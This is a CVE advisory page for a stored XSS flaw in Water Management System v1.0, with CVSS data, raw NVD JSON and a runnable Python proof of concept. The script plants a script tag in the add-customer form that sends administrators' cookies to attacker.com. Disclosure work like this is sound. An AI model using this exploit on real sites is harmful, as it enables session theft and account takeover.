Security Vulnerability Report
中文
CVE-2025-63447 CVSS 6.1 MEDIUM

CVE-2025-63447

Published: 2025-11-03 16:15:37
Last Modified: 2025-11-07 20:45:32

Description

Water Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in /add_customer.php.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:water_management_system_project:water_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Water Management System v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-63447 XSS PoC # Target: Water Management System v1.0 # Vulnerable Endpoint: /add_customer.php def exploit_xss(target_url, attacker_payload): """ Exploit Stored XSS vulnerability in Water Management System """ target = target_url.rstrip('/') + '/add_customer.php' # Malicious XSS payload - steals cookie payload = attacker_payload if attacker_payload else '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' # Prepare POST data (typical form fields) data = { 'name': payload, 'email': '[email protected]', 'phone': '1234567890', 'address': 'Test Address', 'submit': 'Add Customer' } try: response = requests.post(target, data=data, timeout=10) if response.status_code == 200: print(f'[+] XSS payload submitted successfully') print(f'[+] Payload: {payload}') print(f'[+] Target: {target}') print(f'[*] When admin views customer list, cookie will be stolen') return True else: print(f'[-] Failed to submit payload. Status: {response.status_code}') return False except requests.exceptions.RequestException as e: print(f'[-] Connection error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-63447.py <target_url>') print('Example: python cve-2025-63447.py http://vulnerable-site.com') sys.exit(1) target_url = sys.argv[1] exploit_xss(target_url, None)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63447", "sourceIdentifier": "[email protected]", "published": "2025-11-03T16:15:36.807", "lastModified": "2025-11-07T20:45:31.890", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Water Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in /add_customer.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:water_management_system_project:water_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "C58F1E69-BA8D-4995-BB68-311AC61B76C7"}]}]}], "references": [{"url": "https://github.com/sanin-s1r3n/CVE-Research/blob/main/CVE-8", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}